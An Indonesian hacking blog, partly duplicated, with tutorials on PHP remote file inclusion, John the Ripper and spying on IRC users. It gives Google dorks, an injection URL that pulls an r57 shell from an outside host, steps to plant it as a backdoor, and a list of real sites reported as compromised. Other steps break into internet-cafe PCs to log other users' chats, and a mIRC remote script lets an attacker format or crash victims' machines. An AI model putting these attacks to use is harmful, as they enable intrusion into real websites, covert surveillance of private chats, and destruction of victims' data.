Ringkasan ini tidak tersedia. Harap
klik di sini untuk melihat postingan.
Hello World!
mungkin tutorial ini rada basi sih.. cma /me cma mo share azah!
anak2 demohacking pasti da pada tau..
PHP injection...
pertama2 kita buka google.com
kita memasuk kan keyword nya di sana...
keyword nya yg di maksudkan di sini adalah dork,.. [bisa di lihat di
millw0rm.com cari sendiri yg laen]
Kita mulai saja!
sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=
allinurl%3Aindex.php%3Fa%3Ddisplay
allinurl:index.php?a=display
allinurl <=- mencari setiap kata pada url...
index.php?a=display
sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=
http://www.historywebsites.com//index.php?a=display <=- tampil pada
google..
http://www.historywebsites.com// <=- victim domain
index.php?a=display <=- DORK... kata kunci pada google...
http://www.historywebsites.com/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=
wwww.[domain].com/[path]/[file]?[BUGS]=[injector]?
injektor nya ada di link..
Quote:
http://www.geocities.com/yogya_hack/becak.tar.gz
Quote:
http://evilarmy.hostcentric.com/becak.tar.gz
itu adalah r57
hmm....
kalau sudah masuk ke web nya.. jangan lupa pasang backdoor...
cara nya ..
lwp-download http://www.geocities.com/yogya_hack/becak.tar.gz;ls -lia
jgn lupa... letak kan file nya di direktory yg permission drwxrwxrwx
find . -type d -perm 777
cari dari direktori skr sebuah direktori lain yang bisa di tlis...
find . -type f -perm 777 <=- mencari file
find / -type d -perm 777 <=- mencari dari direktori / (root)
Quote:
Backdoor PHP
1. lwp-download http://www.geocities.com/yogya_hack/becak.tar.gz
2. mv becak.tar.gz door.php
Contoh Hasil Site backdoor:
http://www.target.com/[path]/door.php
okeh...
sekian dl..
sector clear!!
Thanks Goes To:
ZeTH a.k.a s3t4n [Big thanks for finding the bugs!]
^MoNgOnDoW^ [Big thanks for lending the room!]
YF Xcode Big Famz! [thanks for support!]
^F_C^ [you know me!]
and all crewz!
#Becak & B-H-T crewz Vaksin13 OoN_BoY [makes me smile all the time!]
ini ada beberapa contoh shell nya...
semoga masih berjalan!
Quote:
http://www.historywebsites.com/topsites/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? uid=48(apache) gid=48(apache) groups=48(apache),
2522(psaserv)
http://www.steroidsource.net/sources/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? uid=32211(wantflir) gid=32211(wantflir)
groups=32211(wantflir)
http://dreamweaver.net.ru/ex/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz?
http://www.trsaga.com/top/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? uid=99(nobody) gid=99(nobody) groups=99(nobody)
http://www.clubbangaz.net/tpl/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? user=banga uid=1476 gid=812
http://www.gameserverlist.de/toplist/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? user=web5 uid=670 gid=104
http://www.r.kmdn.ru/sources/lostpw.php?FORM[set]=1&FORM[session_id]
=1&CONFIG[path]=http://www.evilarmy.hostcentric.com/becak.tar.gz?
user=kmdn-r uid=2422 gid=1754
http://www.bullterrier.kiev.ua/topsites/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? uid=99(nobody) gid=99(nobody) groups=99(nobody)
http://www.gurbetporthosting.com/GurbetPortList/sources/lostpw.php?
FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.
hostcentric.com/becak.tar.gz? user= uid= gid=643 save
http://a-z.az/top/sources/lostpw.php?FORM[set]=1&FORM[session_id]
=1&CONFIG[path]=http://www.evilarmy.hostcentric.com/becak.tar.gz?
user=a3544_1 uid=10130 gid=2524
http://vietcong.ath.cx/xampp/www/ucu/bannerlist//sources/lostpw.php?
FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.
hostcentric.com/becak.tar.gz? SYSTEM win
http://www.cityofgod.org/top/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? uid=99(nobody) gid=99(nobody) groups=99(nobody),
511(restricted)
http://top.mavit.kiev.ua/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz?
om admin.. jgn di pindah yah.. seharus nya ada di atas itu...
hehehe
mungkin tutorial ini rada basi sih.. cma /me cma mo share azah!
anak2 demohacking pasti da pada tau..
PHP injection...
pertama2 kita buka google.com
kita memasuk kan keyword nya di sana...
keyword nya yg di maksudkan di sini adalah dork,.. [bisa di lihat di
millw0rm.com cari sendiri yg laen]
Kita mulai saja!
sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=
allinurl%3Aindex.php%3Fa%3Ddisplay
allinurl:index.php?a=display
allinurl <=- mencari setiap kata pada url...
index.php?a=display
sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=
http://www.historywebsites.com//index.php?a=display <=- tampil pada
google..
http://www.historywebsites.com// <=- victim domain
index.php?a=display <=- DORK... kata kunci pada google...
http://www.historywebsites.com/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=
wwww.[domain].com/[path]/[file]?[BUGS]=[injector]?
injektor nya ada di link..
Quote:
http://www.geocities.com/yogya_hack/becak.tar.gz
Quote:
http://evilarmy.hostcentric.com/becak.tar.gz
itu adalah r57
hmm....
kalau sudah masuk ke web nya.. jangan lupa pasang backdoor...
cara nya ..
lwp-download http://www.geocities.com/yogya_hack/becak.tar.gz;ls -lia
jgn lupa... letak kan file nya di direktory yg permission drwxrwxrwx
find . -type d -perm 777
cari dari direktori skr sebuah direktori lain yang bisa di tlis...
find . -type f -perm 777 <=- mencari file
find / -type d -perm 777 <=- mencari dari direktori / (root)
Quote:
Backdoor PHP
1. lwp-download http://www.geocities.com/yogya_hack/becak.tar.gz
2. mv becak.tar.gz door.php
Contoh Hasil Site backdoor:
http://www.target.com/[path]/door.php
okeh...
sekian dl..
sector clear!!
Thanks Goes To:
ZeTH a.k.a s3t4n [Big thanks for finding the bugs!]
^MoNgOnDoW^ [Big thanks for lending the room!]
YF Xcode Big Famz! [thanks for support!]
^F_C^ [you know me!]
and all crewz!
#Becak & B-H-T crewz Vaksin13 OoN_BoY [makes me smile all the time!]
ini ada beberapa contoh shell nya...
semoga masih berjalan!
Quote:
http://www.historywebsites.com/topsites/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? uid=48(apache) gid=48(apache) groups=48(apache),
2522(psaserv)
http://www.steroidsource.net/sources/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? uid=32211(wantflir) gid=32211(wantflir)
groups=32211(wantflir)
http://dreamweaver.net.ru/ex/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz?
http://www.trsaga.com/top/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? uid=99(nobody) gid=99(nobody) groups=99(nobody)
http://www.clubbangaz.net/tpl/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? user=banga uid=1476 gid=812
http://www.gameserverlist.de/toplist/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? user=web5 uid=670 gid=104
http://www.r.kmdn.ru/sources/lostpw.php?FORM[set]=1&FORM[session_id]
=1&CONFIG[path]=http://www.evilarmy.hostcentric.com/becak.tar.gz?
user=kmdn-r uid=2422 gid=1754
http://www.bullterrier.kiev.ua/topsites/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? uid=99(nobody) gid=99(nobody) groups=99(nobody)
http://www.gurbetporthosting.com/GurbetPortList/sources/lostpw.php?
FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.
hostcentric.com/becak.tar.gz? user= uid= gid=643 save
http://a-z.az/top/sources/lostpw.php?FORM[set]=1&FORM[session_id]
=1&CONFIG[path]=http://www.evilarmy.hostcentric.com/becak.tar.gz?
user=a3544_1 uid=10130 gid=2524
http://vietcong.ath.cx/xampp/www/ucu/bannerlist//sources/lostpw.php?
FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.
hostcentric.com/becak.tar.gz? SYSTEM win
http://www.cityofgod.org/top/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? uid=99(nobody) gid=99(nobody) groups=99(nobody),
511(restricted)
http://top.mavit.kiev.ua/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz?
om admin.. jgn di pindah yah.. seharus nya ada di atas itu...
hehehe
Pengenalan
----------
John the Ripper merupakan password cracker yang cepat. JTR tersedia
pada berbagai
platform baik *nix, DOS, win32. Tujuan utamanya adalah mendeteksi
kelemakan
password pada Unix. Tetapi JTR juga dapat mengcrack password pada Win
NT/2000/XP
yang berbentuk LM hashes.
Bagi yang belum mempunyai JTR, anda dapat download disini:
- http://www.openwall.com/john/
Ada beberapa hal penting pada JTR
[passfile] - Nama dari password file anda
[wordlist] - Kumpulan kata-kata
[output] - Hasi decrypt password
[session name] - Nama yang anda gunakan untuk menyimpan session
-- contoh Pasword File: passwd.txt --
root:VwL97VCAx1Qhs:0:0:root:/root:/bin/bash
user:aH0qcQOVz7e0s:515:100:user:/home/user:/bin/bash
lin:iWuSGrtezXz0E:515:100:lin:/home/lin:/bin/bash
-- contoh Pasword File: passwd.txt --
Note: Simpan [passfile] di folder yang sama dengan file execute JTR
Hal ini untuk mempermudah penggunaan JTR :)
Terdapat 3 mode pada JTR untuk mendecrypt password
1. Single Mode
Pada Single Mode, JTR akan berusaha mencari Password yang paling
lemah dari seluruh password. Cara ini merupakan cara yang paling
cepat.
Syntax single mode
- john -single [passfile]
atau
- john -si [passfile]
Co: Anda mempunyai password file passwd.txt
Maka penggunaannya : john -si passwd.txt
2. Wordfile Mode
Wordfile Mode merupakan cara tercepat ke 2. Wordfile Mode membutuhkan
kamus kata-kata.
Wordfile syntax
john -wordfile:[wordlist] [passfile]
atau
john -w:[wordlist] [passfile]
Co: Anda mempunyai password file passwd.txt dan mempunyai kamus kata words.lst
john -w:words.lst passwd.txt
3. Incremental Mode
Incremental Mode merupakan cara yang paling lambat dan berusaha untuk
mendecrypt semua password, akan memakan waktu berhari-hari, bermingu-minggu,
bahkan berbulan-bulan (berlebihan gak ya :p). Sebaiknya anda menggunakan
cara ini apabila 2 cara sebelumnya gagal.
Terdapat 4 perintah dasar dalam penggunaannya
a. digits: Akan mencoba mendecrypt semua password dengan karakter angka
b. alpha: Akan mencoba mendecrypt semua password dengan karakter huruf
c. all: Akan mencoba mendecrypt semua password dengan semua karakter
termasuk karakter spesial, co: @!^&?
d. tidak memilih mode: Akan mencoba mendecrypt password dengan segala cara
Syntax:
john -i [passfile]
john -i:DIGITS [passfile]
john -i:ALPHA [passfile]
john -i:ALL [passfile]
Co: Anda mempunyai password file passwd.txt
john -i passwd.txt
john -i:DIGITS passwd.txt
john -i:ALPHA passwd.txt
john -i:ALL passwd.txt
Mode lainnya pada JTR
- Show Mode
Setelah anda mendapatkan password yang telah di decrypt, anda dapat menyimpannya
pada file tertentu.
Syntax:
john -show [passfile]>[output]
Co: Anda mempunyai password file passwd.txt dan ingin menghasilkan output hasil.txt
john -show passwd.txt>hasil.txt
Anda juga dapat melihat langsung hasil decrypt dari JTR.
Syntax:
john -show [passfile]
Hasilnya terlihat seperti berikut:
root:root:0:0:root:/root:/bin/bash
user:company:515:100:user:/home/user:/bin/bash
lin:rootme:515:100:lin:/home/lin:/bin/bash
3 passwords cracked, 0 left
- Menghentikan JTR
Untuk menghentikan JTR anda dapat menekan CTRL+C
- Rules
Digunakan bersamaan dengan wordfile mode, tanpa rules JTR hanya akan mencoba
kata-kata yang terdapat pada wordlist. Apabila anda mengaktifkannya maka JTR
akan mencoba variasi dari kata2 pada wordlist.
Syntax
john w:[wordlist] -rules [passfile]
- Session & Restore
Mendecrypt password dapat memakan waktu sangat lama. Anda dapat menghentikan
JTR dengan CTRL+C, kemudian di lain waktu dapat dilanjutkan kembali dengan
syntax restore. Dengan melakukan hal tersebut akan membawa JTR kembali ke
session terakhir.
Syntax
john -restore
john -restore:[session name]
john -session:[session name]
- Saat melakukan cracking, JTR hanya menampilkan kursor yang berkedip.Apabila
anda ingin melihat sampai dimana JTR bekerja, anda dapat menekan "sembarang
tombol", JTR akan menampilkan status terakhir.
- Semua password yang pernah di crack disimpan JTR di john.pot
Anda bisa mendapatkan Wordfile di site-site berikut:
1. http://www.openwall.com/passwords/wordlists/
2. http://www.sparkleware.com/lists.html
3. http://ftp.cerias.purdue.edu/pub/dict/local/
4. ftp://sable.ox.ac.uk/pub/wordlists/
5. http://www.theargon.com/archives/wordlists/theargonlists/
Referensi AKA Bacaan:
1. Dokumentasi JTR
2. http://www.openwall.com/john/
3. http://securitysite.host.sk/jtr.html
----------
John the Ripper merupakan password cracker yang cepat. JTR tersedia
pada berbagai
platform baik *nix, DOS, win32. Tujuan utamanya adalah mendeteksi
kelemakan
password pada Unix. Tetapi JTR juga dapat mengcrack password pada Win
NT/2000/XP
yang berbentuk LM hashes.
Bagi yang belum mempunyai JTR, anda dapat download disini:
- http://www.openwall.com/john/
Ada beberapa hal penting pada JTR
[passfile] - Nama dari password file anda
[wordlist] - Kumpulan kata-kata
[output] - Hasi decrypt password
[session name] - Nama yang anda gunakan untuk menyimpan session
-- contoh Pasword File: passwd.txt --
root:VwL97VCAx1Qhs:0:0:root:/root:/bin/bash
user:aH0qcQOVz7e0s:515:100:user:/home/user:/bin/bash
lin:iWuSGrtezXz0E:515:100:lin:/home/lin:/bin/bash
-- contoh Pasword File: passwd.txt --
Note: Simpan [passfile] di folder yang sama dengan file execute JTR
Hal ini untuk mempermudah penggunaan JTR :)
Terdapat 3 mode pada JTR untuk mendecrypt password
1. Single Mode
Pada Single Mode, JTR akan berusaha mencari Password yang paling
lemah dari seluruh password. Cara ini merupakan cara yang paling
cepat.
Syntax single mode
- john -single [passfile]
atau
- john -si [passfile]
Co: Anda mempunyai password file passwd.txt
Maka penggunaannya : john -si passwd.txt
2. Wordfile Mode
Wordfile Mode merupakan cara tercepat ke 2. Wordfile Mode membutuhkan
kamus kata-kata.
Wordfile syntax
john -wordfile:[wordlist] [passfile]
atau
john -w:[wordlist] [passfile]
Co: Anda mempunyai password file passwd.txt dan mempunyai kamus kata words.lst
john -w:words.lst passwd.txt
3. Incremental Mode
Incremental Mode merupakan cara yang paling lambat dan berusaha untuk
mendecrypt semua password, akan memakan waktu berhari-hari, bermingu-minggu,
bahkan berbulan-bulan (berlebihan gak ya :p). Sebaiknya anda menggunakan
cara ini apabila 2 cara sebelumnya gagal.
Terdapat 4 perintah dasar dalam penggunaannya
a. digits: Akan mencoba mendecrypt semua password dengan karakter angka
b. alpha: Akan mencoba mendecrypt semua password dengan karakter huruf
c. all: Akan mencoba mendecrypt semua password dengan semua karakter
termasuk karakter spesial, co: @!^&?
d. tidak memilih mode: Akan mencoba mendecrypt password dengan segala cara
Syntax:
john -i [passfile]
john -i:DIGITS [passfile]
john -i:ALPHA [passfile]
john -i:ALL [passfile]
Co: Anda mempunyai password file passwd.txt
john -i passwd.txt
john -i:DIGITS passwd.txt
john -i:ALPHA passwd.txt
john -i:ALL passwd.txt
Mode lainnya pada JTR
- Show Mode
Setelah anda mendapatkan password yang telah di decrypt, anda dapat menyimpannya
pada file tertentu.
Syntax:
john -show [passfile]>[output]
Co: Anda mempunyai password file passwd.txt dan ingin menghasilkan output hasil.txt
john -show passwd.txt>hasil.txt
Anda juga dapat melihat langsung hasil decrypt dari JTR.
Syntax:
john -show [passfile]
Hasilnya terlihat seperti berikut:
root:root:0:0:root:/root:/bin/bash
user:company:515:100:user:/home/user:/bin/bash
lin:rootme:515:100:lin:/home/lin:/bin/bash
3 passwords cracked, 0 left
- Menghentikan JTR
Untuk menghentikan JTR anda dapat menekan CTRL+C
- Rules
Digunakan bersamaan dengan wordfile mode, tanpa rules JTR hanya akan mencoba
kata-kata yang terdapat pada wordlist. Apabila anda mengaktifkannya maka JTR
akan mencoba variasi dari kata2 pada wordlist.
Syntax
john w:[wordlist] -rules [passfile]
- Session & Restore
Mendecrypt password dapat memakan waktu sangat lama. Anda dapat menghentikan
JTR dengan CTRL+C, kemudian di lain waktu dapat dilanjutkan kembali dengan
syntax restore. Dengan melakukan hal tersebut akan membawa JTR kembali ke
session terakhir.
Syntax
john -restore
john -restore:[session name]
john -session:[session name]
- Saat melakukan cracking, JTR hanya menampilkan kursor yang berkedip.Apabila
anda ingin melihat sampai dimana JTR bekerja, anda dapat menekan "sembarang
tombol", JTR akan menampilkan status terakhir.
- Semua password yang pernah di crack disimpan JTR di john.pot
Anda bisa mendapatkan Wordfile di site-site berikut:
1. http://www.openwall.com/passwords/wordlists/
2. http://www.sparkleware.com/lists.html
3. http://ftp.cerias.purdue.edu/pub/dict/local/
4. ftp://sable.ox.ac.uk/pub/wordlists/
5. http://www.theargon.com/archives/wordlists/theargonlists/
Referensi AKA Bacaan:
1. Dokumentasi JTR
2. http://www.openwall.com/john/
3. http://securitysite.host.sk/jtr.html
Tips dan triks IRC ini sangat populer di kalangan chatter karena tips dan triks ini berisi cara melindungi identitas diri kita dari para chatter lainnya sekaligus juga dapat untuk mengetahui keberadaan teman chatting kita, memata-matai dia, melihat isi chattingan dia sampai meremote mIRC teman chatting kita tersebut.
Tips di IRC
Nih tips untuk para chatter IRC, mau tahu ?
Pertama-tama..
Sebelum anda memulai chatting dengan mIRC ada 3 hal yang sangat penting yang harus anda perhatikan :
1. Periksa Full name pada option Connect, gantilah Full name jika ada nama warnetnya tertulis
2. Periksa pada option Connect lalu pada identd, gantilah "user id" jika ada nomor room tertulis disini.
3. Periksa pada option IRC lalu pada Logging, gantilah menjadi "none" pada "automatically logs" jika posisi diluar itu.
4. Periksa pada Windows Task Manager apakah ada Keylogger terpasang :)
Tips diatas itu adalah kewaspadaan standard agar kita tidak mudah diketahui teman chatter kita.
Efek jika tidak menuruti tips diatas maka efeknya adalah :
1. jika "user id" tersebut memberi angka / nama room saat anda sedang chatting maka anda sama saja membuka diri
2. Jika pada logging bukan "none" maka bersiap-siaplah isi chattingan anda dilihat orang ketiga
3. Keylogger adalah program yang berbahaya jika terpasang, Ini yang cukup susah diperiksa jika tidak ada program scanner keylogger, tapi jika anda ingin memeriksanya tekan Ctrl+Alt+del, lihat list program yang sedang berjalan, jika ada nama program yang aneh dan asing berjalan maka matikan saja prosesnya tapi anda harus hati-hati dalam melakukanya, tapi dari semua itu anda tidak perlu resah karena kenyataanya sangat jarang ada user melakukan hal ini karena warnet-warnet saat ini telah dilengkapi program-program canggih untuk menangani hal beginian (restore).
Penulis :
Yogya Family Code
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)
Tips tambahan di IRC
Tips tambahan khusus para chatter yang ingin menyembunyikan diri
Jika anda ingin chatting benar-benar tidak ingin ada yang tahu keberadaan anda maka anda bisa mengikuti tips kehati-hatian ini, karena memang kadang tips ini sering kali dilupakan karena memang tips ini sedikit gerah untuk dilaksanakan, tapi gak ada salahnya kan kita mencoba ?
1. Periksalah Quit Message pada menu pilihan IRC lalu messages, jika disitu muncul nama dan alamat warnet maka segera gantilah pesan itu dengan kalimat lain atau dikosongkan saja, karena jika anda mengaktifkannya maka pada saat keluar dari IRC maka pesan ini akan muncul di channel dan orang lain akan mengetahui dimana anda berada saat chatting.
2. Ssetelah keluar / disconnect dari mIRC, jangan lupa masuk mIRC lagi, dan segera ganti nama, e-mail, nickname alternative juga user id karena jika anda lupa menggantinya maka orang yang menggunakan komputer setelah anda akan mengetahui nama, e-mail, nickname,. alternativ dan user id anda.
3. Jangan lupa, jika anda sering copy paste, segera hilangkan memory copy paste anda dengan melakukan copy text lain untuk menghindari orang lain untuk mengetahui paste text anda.
Semoga informasi diatas dapat membantu dan menambah pengetahuan anda.
Penulis :
Yogya Family Code
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)
Tips tambahan di IRC II
Tips agar kita tidak diremote atau dipermainkan di IRC
Sudah biasa banyak sekali spam di IRC yang menganggu contohnya ini :
WANNA BE OPERATOR #channel ?? copy/paste this-> < <== Jangan copy paste di mIRC anda kalau ada hal beginian karena dapat merusak / menyerang komputer anda (Sering ada di channel-channel besar, webmaster dah cek )
STOP SPAM copy/paste this-> <<== Ini juga sama saja
Cara menangani para cracker :
1. Periksalah remote mIRC anda caranya Tahan Alt lalu tekan R.
2. Biasanya mIRC-mIRC warnet dikosongkan remotenya tapi jika ada isinya lebuh baik delete remote yang sekiranya aneh (asing).
3. Periksa timer anda, caranya (ketik /timer ) jika misal ada timer yang bekerja ketik //!timers off
4. Menghilangkan decode :
Ketik kode ini di mIRC :
//!timers off | !ignore -r | !unload -rsn " $+ $chr(160) $+ . $+ $chr(160) $+ " | !remove " $+ $chr(160) $+ . $+ $chr(160) $+ " | !say $script($script(0))
Penulis :
Yogya Family Code
Referensi
rhega (OP #Yogyakarta)
Triks di IRC :
Cara agar bisa masuk ke dal.net dal.net dimana sebelumnya tidak bisa masuk karena trojan atau virus ?
masuklah ke irc.server.telkom.net.id setelah itu baru baru membuka server dal.net, jika masih tidak bisa maka anda harus mencari program scan antivirus dan trojan, anda dapat mendownloadnya berdasar referensi DAL.NET pada saat pesan terahkir connect.
Bagaimana cara melacak keberadaan teman chat kita ?
Whois saja chatter tersebut lalu cocokkan ip addreasnya dengan daftar ip addreas warnet Yogya di samping kanan. Jika ip addreas anda tidak ada dalam daftar maka anda dapat menggunakan pelacakan lain seperti http://www.apnic.org, :)
Bagaimana cara melacak boks warnet teman chat kita ?
Whois saja chatter tersebut lalu lihat sebelah kiri dari sebelum tanda "@ip addreas", jika ada angka maka kemungkinan besar dia di room tersebut, jika tidak ada maka periksa ip addreasnya apakah warnet tersebut menerapkan berbeda ip addreas tiap boks, jika iya maka hitunglah logika ip addreas tersebut sehingga ahkirnya dapat menemukan tempat boks teman chat anda.
Bagaimana kita ingin mencari teman chat di warnet sendiri (Hanya untuk channel yang memiliki BOT khusus !seen)?
D di channel #yogyakarta cukup ketikkan !seen *!*@ip addreas warnet anda, bisa juga dengan !seen nickname, fasilitas ini biasanya disediakan channel-channel besar tapi tidak menutep channel kecilpun mempunyai fasilitas ini.
Bagaimana kita ingin mencari teman chat di warnet sendiri ? (Dari perintah DAL.NET! Tidak perlu BOT channel)
/who #nama channel *@ip addreas warnet (cara ini sangat efektif jika BOT channel benar-benar memproteksi para chatter sehingga sangat membatasi informasi yang akan diberikan kepada anda).
Bagaimana kita ingin mencari nickname teman kita di channel #yogyakarta ?
cukup mudah, ketikkan di channel #yogyakarta !seen nickname teman kita.
Bagaimana cara kita memata-matai teman chat kita di satu warnet ? Masuklah di Network Neighboure lalu cari nomor room teman chat kita lalu masuklah di logs mirc teman kita biasanya di "c:\program files\mirc\logs".
Bagaimana cara kita meyakinkan bahwa teman chat kita disuatu room memang benar adanya memakai nickname yang kita maksud ?
Masuklah di Network Neighboure lalu cari nomor room teman chat kita lalu masuklah ke directory mirc teman kita biasanya di "c:\program files\mirc" lalu buka file mirc.ini. Jika anda mengalami masalah tiap komputer dipassword maka anda dapat memanfaatkan program Internet Maniac beserta PQwak, jika tiap komputer menggunakan Windows XP, tembus aja pakek KAHT yang bisa kamu download disini.
Proteksi diri di IRC dapat dilakukan dengan PSY dan Proxy tapi yang umum dan tidak memakan biaya adalah menggunakan proxy, bagaimana caranya ?
Carilah proxy di google, kemudian pastekan ke option mIRC yaitu pada "connect" lalu "firewall', firewall support diganti "server", protocol diganti "proxy" lalu tinggal anda isi hostname dan portnya sesuai dengan proxy yang anda dapatkan.
Referensi untuk mendapatkan proxy :
- http://www.proxyweb.net
- http://proxy.lessel.us/cgi-bin/nph-proxy.cgi
- http://www.multiproxy.org
- http://www.publicproxyservers.com/index.html
- http://www.hotscripts.com/Detailed/28480.html
- http://www.inetprivacy.com/a4proxy/anonymous-grc.htm
- http://www.sa6ry.com/surfanonymous/faq/hide-ip-address.html
- http://www.steganos.com (proxy)
- http://www.guardster.com (free proxy)
- http://www.anonymizer.com/index.cgi (proxy)
- http://www.orangatango.com/home/index.ie.html (proxy)
- http://proxify.com
- http://www.tehbox.com/proxy
- http://www.proxy4free.com/index.html
- http://www.stayinvisible.com/index.pl
- http://free-proxies.com
(Referensi Proxy dari Si Cebol, Indonewbies.tk)
Menampilkan ip-ip addreas para chatter di channel?
Pada Option lalu pilih IRC lalu aktifkan / centang pada Show Ip Addreasess
Penulis :
Yogya Family Code
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)
Special triks di IRC :
Melihat seluruh isi chattingan teman kita disatu warnet walaupun komputer client / server tidak dishare sama sekali ! Luar biasa !
(Ilmu rahasia kreasi webmaster sendiri pada bulan November 2004)
Syarat untuk melakukan teknik memata-matai orang chatting di satu jaringan LAN (Local Area network) adalah sebagai berikut :
1. Menguasai MS-DOS dengan baik (Karena disini semua menggunakan DOS)
2. Punya logika yang baik dan dapat mengetik cepat (Karena disini anda dikejar dengan waktu dan membutuhkan pemikiran yang cepat)
Baiklah kita langsung saja, terapkan ilmu KaHT seperti ditutorial hacker lalu untuk masuk ke komputer sasaran, setelah anda masuk dikomputer tujuan, segera anda masuk ke MiRC komputer sasaran biasanya ada di c:\program files\mirc (ketik : "cd\progra~1\mirc") tapi ada juga yang di c:\mirc tapi sangat jarang, (ketik : "cd\mirc")
A. Untuk komputer yang drive D-nya di share :
Saat ini anda periksa apakah komputer sasaran drive d-nya dishare ? jika ya ikuti cara dibawah ini
jadi kodenya seperti dibawah ini kalau mau lengkap seperti ini
[dirs]
logdir=d:\
[options]
n1=5,100,0,0,0,0,0,0,0,1,0,1,1,1,1,1,1,1,0,0,1,1,1,0,5,0,0,0,0,0,1,0,0
setelah itu tekan ctrl + z untuk menyimpan, lalu tinggal anda masuk ke drive D komputer tersebut melalui LAN yang tentu saja sudah dishare, jadi cukup double klik aja files berekstensi log, lalu buka files itu pakek notepad untuk melihat terus isi chattingannya.
Jadi kesimpulannya yang membuat penyimpanan file log di drive D karena perintah :
[dirs]
logdir=d:\
Jika anda bingung dalam menghitungkan angkanya diatas, ini urutannya untuk mempermudah:
1. 5=1x
2. 100=1x
3. 0=7x
4. 1=1x
5. 0=1x
6. 1=7x
7. 0=2x
8. 1=3x
9. 0=1x
10. 5=1x
11. 0=5x
12. 1=1x
13. 0=2x
B. Untuk komputer sasaran tidak dishare :
Setelah anda membaca cara A Lalu sekarang bagaimana jika drive d tidak dishare ? tidak masalah ! kita tetap bisa mengikuti isi chattingan dia, caranya seperti diawal tadi yaitu cari dahulu program mIRC komputer sasaran yang biasanya ada di c:\program files\mirc (ketik : "cd\progra~1\mirc") tapi ada juga yang di c:\mirc tapi sangat jarang, (ketik : "cd\mirc")
Setelah kita masuk didirektory MiRC, ketik "del mirc ini" setelah itu ketik "copy con mirc.ini" lalu ketik kode rekam mirc.ini dibawah ini :
[options]
n1=5,100,0,0,0,0,0,0,0,1,0,1,1,1,1,1,1,1,0,0,1,1,1,0,5,0,0,0,0,0,1,0,0
setelah itu tekan ctrl + z untuk menyimpan, lalu silahkan tengok di "c:\progra~1\mirc\logs" cara melihat cukup ketik "type nickname.log*
* : Nickname diisi nick orang
Luar biasa buka, ingat sebagai catatan, Agar teknik berjalan baik maka teknik ini dilakukan / diterapkan pada semua boks warnet sebelum chatter tersebut chatting diboks tersebut, atau kalau udah terlanjut dia chatting di boks tersebut maka diset rekam aja MiRCnya gpp, sapa tahu MiRCnya error lalu dia buka lagi, :)
Dari tutorial ini maka dimanapun anda berada, semua isi chatting anda dapat dilihat orang walaupun anda tidak menyadarinya, "anda tidak melihat kami tapi kami melihat anda" :))
Penulis :
Yogya Family Code
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)
Remote IRC (Mengontrol 100% segala chattingan user)
ketikkan perintah "ctcp *:*:?:$1-" ke dalam remote mIRC sasaran lalu masukan juga di dalam variables "%master Nick_kamu".
Perintah mengontrol komputer target :
/ctcp run rundll user,#7 : Melakukan Shutdown komputer sasaran
/ctcp run rundll user,#3 : Membuat Crash / Hang komputer sasaran
/ctcp run rundll user,#4 : Mengacaukan tampilan yang ahkirnya komputer sasaran Crash /Hang
/ctcp run format /y : Melakukan format pada komputer sasaran
/ctcp run http://.com : Membuka situs sesuai keinginan kamu
/ctcp /nick : Mengganti nick mIRC sasaran
